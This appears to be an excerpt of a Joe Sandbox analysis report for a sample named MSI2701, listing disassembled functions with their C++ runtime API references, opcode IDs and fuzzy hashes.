                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b3a944323c42b89b312a9a543878ace2a1101250d62229ab112b40dcc24def71
                                                                                                                                                            • Instruction ID: c7b7094af4f2ec43b1e843471f74760d7695a92f87fa3ad7b8bff6274e9d85c8
                                                                                                                                                            • Opcode Fuzzy Hash: b3a944323c42b89b312a9a543878ace2a1101250d62229ab112b40dcc24def71
                                                                                                                                                            • Instruction Fuzzy Hash: 18010035900159DBCB15EB659815BBE77B0BFA0714F24440FF4006B391CFB89E05CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2C51
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2C5B
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2CAC
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2CCC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b49621489ced6985e6fd1f0840259fe4d41d3ef7af3ea85c891ad44eb476e548
                                                                                                                                                            • Instruction ID: 1a95dbd1113bdd987a1147d17b7a2dfd4a2d77f0f5711c6ba05589851667137a
                                                                                                                                                            • Opcode Fuzzy Hash: b49621489ced6985e6fd1f0840259fe4d41d3ef7af3ea85c891ad44eb476e548
                                                                                                                                                            • Instruction Fuzzy Hash: E8010039800119EBCB05EBA18915BBE77B0BF90B14F24040FF40067391CFB89E009BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEC5D
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEC67
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DECB8
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DECD8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 1f91699d3e2973d45411005edf02c51e353277c2ba33d15c41a3ddac865fd465
                                                                                                                                                            • Instruction ID: bcd2b05ac5275eb03e8de647601a2d14b15e53dbb1c4affd75d71b002e8ffb70
                                                                                                                                                            • Opcode Fuzzy Hash: 1f91699d3e2973d45411005edf02c51e353277c2ba33d15c41a3ddac865fd465
                                                                                                                                                            • Instruction Fuzzy Hash: 5C01AD35900119DBCB05AB668865BBE77B1BF84B24F24080FE5016B391DF7C9E059BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2CE6
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2CF0
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2D41
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2D61
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 26efd578ec88e859203dab1bfa4ea20d2f1f920847fa0cb3aa46b96344c1e799
                                                                                                                                                            • Instruction ID: 861ab9bfb8a1cc972c53e0de6b6210f8d5d09d3498abe850d689beb07e59fc57
                                                                                                                                                            • Opcode Fuzzy Hash: 26efd578ec88e859203dab1bfa4ea20d2f1f920847fa0cb3aa46b96344c1e799
                                                                                                                                                            • Instruction Fuzzy Hash: 2D01ED358002199FCB15EB619815BBE77B1BF94714F24050FE5106B392CFB89E018BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2E10
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2E1A
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2E6B
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2E8B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: a665ecb7c79970f0793e062d8040af8a3be247f9174ff31f301e1c4d715daee6
                                                                                                                                                            • Instruction ID: 54c1264a042091559cd38d8f0f2967c46335b289a7bb4952346e306d86043bbe
                                                                                                                                                            • Opcode Fuzzy Hash: a665ecb7c79970f0793e062d8040af8a3be247f9174ff31f301e1c4d715daee6
                                                                                                                                                            • Instruction Fuzzy Hash: AE010036800129DBCB01EB61C815BBEB7B0BFA4714F24080FE50067391CF789E058BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2EA5
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2EAF
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2F00
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2F20
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b97266248c5b9dec33ed0bba47bf77fffe0eb8596cde54d178fddda2612fdda7
                                                                                                                                                            • Instruction ID: 850111f855ba302313cf9c7fe9d87344acb34baffe9748f412c98d6bb83af071
                                                                                                                                                            • Opcode Fuzzy Hash: b97266248c5b9dec33ed0bba47bf77fffe0eb8596cde54d178fddda2612fdda7
                                                                                                                                                            • Instruction Fuzzy Hash: 0301C035900229ABCB05EB61D915BBE77B0BF94714F24084FF500A7391CF789E05DBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2F3A
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2F44
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2F95
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2FB5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 042f8ccd017c29c2901d6a8dfd52ccd5a236f134a1c5e38ae75fa7da8166cc45
                                                                                                                                                            • Instruction ID: f6fbf3966a5b373e76a3956c98d672b101a27fd1b973b61585b9aa54a177c1fc
                                                                                                                                                            • Opcode Fuzzy Hash: 042f8ccd017c29c2901d6a8dfd52ccd5a236f134a1c5e38ae75fa7da8166cc45
                                                                                                                                                            • Instruction Fuzzy Hash: 2301D235900119EBCB05EB61C925BBEB7B1BFA4714F24484FF410A7391DFB89E019BA9
                                                                                                                                                            APIs
                                                                                                                                                            • SleepConditionVariableCS.KERNELBASE(?,004E2CBD,00000064), ref: 004E2D43
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D4D
                                                                                                                                                            • WaitForSingleObjectEx.KERNEL32(?,00000000,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D5E
                                                                                                                                                            • EnterCriticalSection.KERNEL32(0051DD3C,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D65
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3269011525-2395104290
                                                                                                                                                            • Opcode ID: fbbd8caefe4af87bad38a34a21def7925e1b4dc91713692ba654c62712279da0
                                                                                                                                                            • Instruction ID: 559e839bc4859b918a9c43d6c96300b69d5bcccd96abbeae6aa48fc9c7055857
                                                                                                                                                            • Opcode Fuzzy Hash: fbbd8caefe4af87bad38a34a21def7925e1b4dc91713692ba654c62712279da0
                                                                                                                                                            • Instruction Fuzzy Hash: E7E0D832A05528BBDB122B41FC08ECE3F39FF1CB51B000011FE0566171C7646945ABF5
                                                                                                                                                            APIs
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004F6E40
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004F6F01
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F68
                                                                                                                                                              • Part of subcall function 004F5BDC: HeapAlloc.KERNEL32(00000000,00000000,A8O,?,004F543A,?,00000000,?,004E6CE7,00000000,A8O,00000000,?,?,?,004F363B), ref: 004F5C0E
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F7D
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F8D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                            • Opcode ID: c81bfd71e39bf3b261fb04ec65430957ba2e24bdf67487ba4e874d0d1e26c37a
                                                                                                                                                            • Instruction ID: 4c3cda207dd9a383d756c70b711d7ad57644a443f34e59d94f48269b4bbc722c
                                                                                                                                                            • Opcode Fuzzy Hash: c81bfd71e39bf3b261fb04ec65430957ba2e24bdf67487ba4e874d0d1e26c37a
                                                                                                                                                            • Instruction Fuzzy Hash: 4651A17260020EAFEB219FA5DC41DBF3AA9EF04754B16016AFE08D7251E779DC109768
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB8DD
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB900
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB928
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CB98D
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB9B7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 459529453-0
                                                                                                                                                            • Opcode ID: 332334917aced2864ca1badf32834fbc0ba2b40dfcbaeb3f5a190a755c41d6fd
                                                                                                                                                            • Instruction ID: ede4c5443017ec400260241de2add9a04ba13270321b4d1d2aa1183509530ea2
                                                                                                                                                            • Opcode Fuzzy Hash: 332334917aced2864ca1badf32834fbc0ba2b40dfcbaeb3f5a190a755c41d6fd
                                                                                                                                                            • Instruction Fuzzy Hash: 4A310375800214DFCB10DF54D952BAEBBB4EF20324F14815EE904A73A1D738AD05CBD6
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2020259771-0
                                                                                                                                                            • Opcode ID: 135f0b5e627df9a966797a84089e3bd44fc78f8d82bd7cc8da471909d5033390
                                                                                                                                                            • Instruction ID: 700a64ca76af1319656b9851a6fd7df7a63b869d92d903496ff30e3ee62403e0
                                                                                                                                                            • Opcode Fuzzy Hash: 135f0b5e627df9a966797a84089e3bd44fc78f8d82bd7cc8da471909d5033390
                                                                                                                                                            • Instruction Fuzzy Hash: 0111BFB1940784BBE720DBA58881F13B7ECAF05714F04051BF9458B751D378FC4087A9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004CEC8E
                                                                                                                                                              • Part of subcall function 004CD87C: __EH_prolog3.LIBCMT ref: 004CD883
                                                                                                                                                              • Part of subcall function 004CD87C: std::_Lockit::_Lockit.LIBCPMT ref: 004CD88D
                                                                                                                                                              • Part of subcall function 004CD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 004CD8FE
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004CEE8A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 2544715827-1734801814
                                                                                                                                                            • Opcode ID: 49a90f7520d4abc5adcd620f23ffefb7ee60a8f8a3e40cd71c8d6e7ac5bf133a
                                                                                                                                                            • Instruction ID: 066e841a07441e3b2a48e330b63a57962d64e316593e63e7b0a1e3829eb5d64f
                                                                                                                                                            • Opcode Fuzzy Hash: 49a90f7520d4abc5adcd620f23ffefb7ee60a8f8a3e40cd71c8d6e7ac5bf133a
                                                                                                                                                            • Instruction Fuzzy Hash: 69C17038E042889EDF61DBA6C550FEDBBB2AF55304F14406FD8856B383C7289D46CB59
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004D62C8
                                                                                                                                                              • Part of subcall function 004D2D74: __EH_prolog3.LIBCMT ref: 004D2D7B
                                                                                                                                                              • Part of subcall function 004D2D74: std::_Lockit::_Lockit.LIBCPMT ref: 004D2D85
                                                                                                                                                              • Part of subcall function 004D2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 004D2DF6
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004D6502
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 2544715827-1734801814
                                                                                                                                                            • Opcode ID: 123e1dad9900dbe44bd9ce827c33604280d7216eb3f38ea70d9e69ba93aa99d6
                                                                                                                                                            • Instruction ID: 0a723ca27a774d8d4c1a24ad79b8f5dcb180f85237ccb3be6754795fa42eeab0
                                                                                                                                                            • Opcode Fuzzy Hash: 123e1dad9900dbe44bd9ce827c33604280d7216eb3f38ea70d9e69ba93aa99d6
                                                                                                                                                            • Instruction Fuzzy Hash: 11C19430E042589BDF21DF68D8617ADBBB1BF11308F55409FD889AB386DB389C85CB58
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004D669E
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 004CB8DD
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 004CB900
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 004CB928
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 004CB9B7
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004D68D8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 3042121994-1734801814
                                                                                                                                                            • Opcode ID: bf3e58e4f72b23ef111ce33595cf7edfecff8b842b2535cd818f91b5412d6ab6
                                                                                                                                                            • Instruction ID: 854c201ca5904a5e1af9355fd4ffdcaa889e70c0ca29bd2319f9a5e6cd2b2e22
                                                                                                                                                            • Opcode Fuzzy Hash: bf3e58e4f72b23ef111ce33595cf7edfecff8b842b2535cd818f91b5412d6ab6
                                                                                                                                                            • Instruction Fuzzy Hash: E0C18570E042588BDF11DF64C8617ADBBB2BF11304F55809FE889AB382DB389D85DB59
                                                                                                                                                            APIs
• LocalAlloc.KERNEL32(00000040,00000018,C7C71CC4,?,00000000), ref: 004CBBA3
• Concurrency::cancel_current_task.LIBCPMT ref: 004CBD7F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AllocConcurrency::cancel_current_taskLocal
• String ID: false$true
• API String ID: 3924972193-2658103896
• Opcode ID: ca151cce7727c0ee323725b4e6b4dc92c4d3ada41e33579f7bfd10ddeedba75d
